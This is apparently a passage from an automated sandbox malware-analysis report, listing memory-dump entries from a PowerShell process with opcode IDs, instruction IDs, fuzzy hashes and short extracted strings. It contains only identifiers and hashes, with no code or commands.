                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8019272F0CB188BE75D9A4C78422B8B3D1E799620F00423FE18EC3282DE29D80706C6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 8M6
                                                                                                                                                                                                                • API String ID: 0-89156010
                                                                                                                                                                                                                • Opcode ID: b3952cf18156c44fd2f8d3bbc15e0c83cf477b75a31503bfa1dc42b2d779fe25
                                                                                                                                                                                                                • Instruction ID: 8dcb93972635be135b08afd81cbd6e0d41b9f07d3ddb2fe6788adc903a33fe81
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3952cf18156c44fd2f8d3bbc15e0c83cf477b75a31503bfa1dc42b2d779fe25
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8019276F0CB188BA65C9A4C68432B8B3D1E799620F00423FE18EC3292DE25D80306C6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: 8M6
                                                                                                                                                                                                                • API String ID: 0-89156010
                                                                                                                                                                                                                • Opcode ID: 8b9143ac82af9b272949a1247f8fa71ecdb8e359b12468a86b10d6a1a08a2330
                                                                                                                                                                                                                • Instruction ID: 9d2ce0cebf1b2d502981ab4f3b6d78fa3e8c215d4ef42045eebf4fa6569bb6c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b9143ac82af9b272949a1247f8fa71ecdb8e359b12468a86b10d6a1a08a2330
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD017176F0CB184BA75C9E5C68432B8B3D1E799621B00423FE18EC3692DE25D80346CA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                • Instruction ID: 5c361bebef17fc1c9ac4046fc77c6f5f802740422d2beffbfcc8ef7673da35cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4341C63131581C8FDA94EB1CE898EA977E1FF6831271505E6E44ECB275DA66EC81CB80
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: e1ebd6aefb8639fa079958063d7cc4769f87cbf369e479242de4ec1656c5996f
                                                                                                                                                                                                                • Instruction ID: 65a1ae0f6a0c608967b78d2555c1b146b22fb39fbf00dcd9a3c7d6f9ab423fb7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1ebd6aefb8639fa079958063d7cc4769f87cbf369e479242de4ec1656c5996f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8841A120A1DD0A8FFA95E77D9044FB9A3D1EF55314B14897AE00EC32A2DD28F8858791
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: ac30ebea27cd7620c42c9cb0a81e1ce8febad9456f7293be5ed9b03a81a6014c
                                                                                                                                                                                                                • Instruction ID: 4bbb1a964361503e01c6a06efcfb3d923f738e58bfb102d1e6c05d6b359c8038
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac30ebea27cd7620c42c9cb0a81e1ce8febad9456f7293be5ed9b03a81a6014c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E741D961F1EE068BFF96A7388451FB8A2C1EF9A310F4584BAD14EC32D7DD39D8054691
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 265c128c2ce4fcf3c72c132f9e82a459e74b0e6eeabfa4c991c9ed6f2d1c18db
                                                                                                                                                                                                                • Instruction ID: f4681f7a38c3e67ca2879b7772cb9d2976def355349a66b276b3c7270b114cfc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 265c128c2ce4fcf3c72c132f9e82a459e74b0e6eeabfa4c991c9ed6f2d1c18db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC21C070629E088FDB99EB2CC494A6577E2FF5931134505BEE08BC7AA1DA24FC41C740
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c646165db1b46df003bb97f5c9f724449737eb69087dbb66a85ff91f9425136b
                                                                                                                                                                                                                • Instruction ID: bfe3105a386620c53507c228a6346eb6710b76ca3a0619b2c32e6831f5eb595c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c646165db1b46df003bb97f5c9f724449737eb69087dbb66a85ff91f9425136b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C11303160D9888FE796EB2CE85CA647FE1EF6A31230905E7E08DCB172D955EC84C791
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: fac090474a10b41aa2a686bf7db5b798ba82b63370d0b8d88789ed0af88ecf1c
                                                                                                                                                                                                                • Instruction ID: 7cea0ae39578d8f77d6653862bf59487ffebf2112fca6ab03c976b26d3f42a64
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fac090474a10b41aa2a686bf7db5b798ba82b63370d0b8d88789ed0af88ecf1c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58113620A1DE094BBB88EB2C945567AB7D1EB99215B044A3FA44EC3691CD99E80542C1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: aa234656cefbfd3b0ff3a4dea18b3a194958ffad4ab29b295cf78ad65bcd7c15
                                                                                                                                                                                                                • Instruction ID: 621a764241ecbbcdd0f47e3556c702e7d498d820336dc5d25e89b1719b945f1b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa234656cefbfd3b0ff3a4dea18b3a194958ffad4ab29b295cf78ad65bcd7c15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC21753050DE498FEB56DB28C454F61BBE1EF56304F0844EAD04DCB2A2DA65FC85CB91
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 449b2d152f8df87a40b93c4fa3a07166e9b6706f47a949278971ba67e98743ae
                                                                                                                                                                                                                • Instruction ID: 486baca5a09c3413814494984db807221c2e47f0cb3bb2262e8eccef99e0def2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 449b2d152f8df87a40b93c4fa3a07166e9b6706f47a949278971ba67e98743ae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7811E561E1D9594FE7A6A73C9405BA83AD1EF5A310B0188F7E04DC71D7E918DC4A43D2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9e46d319adb9e032c24f0d751374d61d8e9962e4ddcec7ba4515404725c94ea7
                                                                                                                                                                                                                • Instruction ID: 7eebecfccaa1a7aa28251699cbb6155d9e3e0acbd817c4a79f8e9ea110af2556
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e46d319adb9e032c24f0d751374d61d8e9962e4ddcec7ba4515404725c94ea7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2311C03190DD888FE312A72488109E6BFE1DF43310B0441BFC05DC71D2D999E94AC7D2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                • Instruction ID: 63ec4a5eaf7b84f8907e312fa6b4527ca117b09f3c9194786937b20ed226ee36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D801677111CB0C8FD748EF4CE451EA5B7E0FB95364F10056EE58AC3661DA36E882CB45
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: baa991d8c17ccb6b3c5ea38cf29ff646e29212c65db9f8077e9e6fd6d6f140c7
                                                                                                                                                                                                                • Instruction ID: ba05ac2d58224b44b236a39d670aab3af9bc1f682080476ab83bb8e80643f363
                                                                                                                                                                                                                • Opcode Fuzzy Hash: baa991d8c17ccb6b3c5ea38cf29ff646e29212c65db9f8077e9e6fd6d6f140c7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20F04C3692DE0C87FB015658AC009E5BBE1EF86329F04057AF51DC3192D7A5E845C7D6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 7bc6c67f8df290468d9297c49da2227083bd29f787a463503667e308250e9929
                                                                                                                                                                                                                • Instruction ID: ee58dccdfa6de50f7a5beec312c70fd638affe3b5cd0206757171a54ec73eb6c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bc6c67f8df290468d9297c49da2227083bd29f787a463503667e308250e9929
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD017574519B8E8FE756DF14C491BE97BA1FF45300F44489AE41D8B1C2CB65E818C7D1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 2b83c5b9abe3e758c3718f86775a6b73a66375d25cd90ec869201cf6b573112b
                                                                                                                                                                                                                • Instruction ID: 73873e531e9cb46ee57e411682fa27638a153b7974aaf37bb49784c6bd3692ae
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b83c5b9abe3e758c3718f86775a6b73a66375d25cd90ec869201cf6b573112b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6E0D8A260DD598FE6B5EB1C94657507FD0EB59340B1048EAE08CC7191E590DC0843C1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 4fa224dcc4e4eebcdf9ad3b5373e97a6366fe4dce36113b6949eee2e331bf776
                                                                                                                                                                                                                • Instruction ID: 69fe589a4ee0f357a33cccff42506a11ae23fc3cc4652d9dc5e80dfdc12bb6fd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4fa224dcc4e4eebcdf9ad3b5373e97a6366fe4dce36113b6949eee2e331bf776
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1A19E9780EBD38FF313672D68A65D4BF90EE5366570944B7C4C89F093E814A84E92E2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (0I$8,I$H1I$I$P/I$^$p0I$-I$/I
                                                                                                                                                                                                                • API String ID: 0-2059724052
                                                                                                                                                                                                                • Opcode ID: f9cfa35ab450f64595e862fa80aa4934e979c9776bf2d7bd2fa93cb366e26cc1
                                                                                                                                                                                                                • Instruction ID: a44bb57883b32b19d9bcb8d453a7f94bf00f27186072c9c916c90a3fded577c7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9cfa35ab450f64595e862fa80aa4934e979c9776bf2d7bd2fa93cb366e26cc1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D571A48390FEC24FF35647A82819665AF91EF93A5070C84FBE08C4A5DBC999DD0D83E5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (Pk$(Pk$(Pk$(Pk$(Pk$(Pk$(Pk$(Pk
                                                                                                                                                                                                                • API String ID: 0-236511238
                                                                                                                                                                                                                • Opcode ID: ea85bc84eb3cb6f618f3006c7b1272da08bc9ed1b17538292e53b34310decab3
                                                                                                                                                                                                                • Instruction ID: 2a945ba849334355d0151f7659aeff139e45288c0d1a5e586724e9c82b5e4022
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea85bc84eb3cb6f618f3006c7b1272da08bc9ed1b17538292e53b34310decab3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F41B452F18D1A5FFA9AEBBC9456BFD92C2EF99750B4045B6D04EC3282DD1CD84643C0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: (Pk$(Pk$(Pk$(Pk
                                                                                                                                                                                                                • API String ID: 0-3946654912
                                                                                                                                                                                                                • Opcode ID: 8713b65a65212887c9074ded6f723b1d00994ec62addfeba3f8c3862ba4f010b
                                                                                                                                                                                                                • Instruction ID: 63ee1dfc7244fb33e8b9d9eca830b9886800f962a7ce8a3a8c31815a0e2e5f0a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8713b65a65212887c9074ded6f723b1d00994ec62addfeba3f8c3862ba4f010b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8B12561D0DA4ACAFBAA97289411BB9B7D0EF47310F04497EE08EC71D6DD18E84A87D0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000011.00000002.2555661467.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7ffaac3d0000_powershell.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: @JI$^$p@]$x.I
                                                                                                                                                                                                                • API String ID: 0-2652421498
                                                                                                                                                                                                                • Opcode ID: 025fce9dbfdc8610059e3312a1d2eb4df6bbf2498039eed714b55b0779e1bcac
                                                                                                                                                                                                                • Instruction ID: dc05e6f2ce9b7138eac92ab8d6d76fbb77cf5cd0183942c0dc361e765645a193
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 025fce9dbfdc8610059e3312a1d2eb4df6bbf2498039eed714b55b0779e1bcac
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D71E08380FEC15FF35746A82C55AB9AE50EB92A4075884FBE0CC4B0DBE948DD0D83E5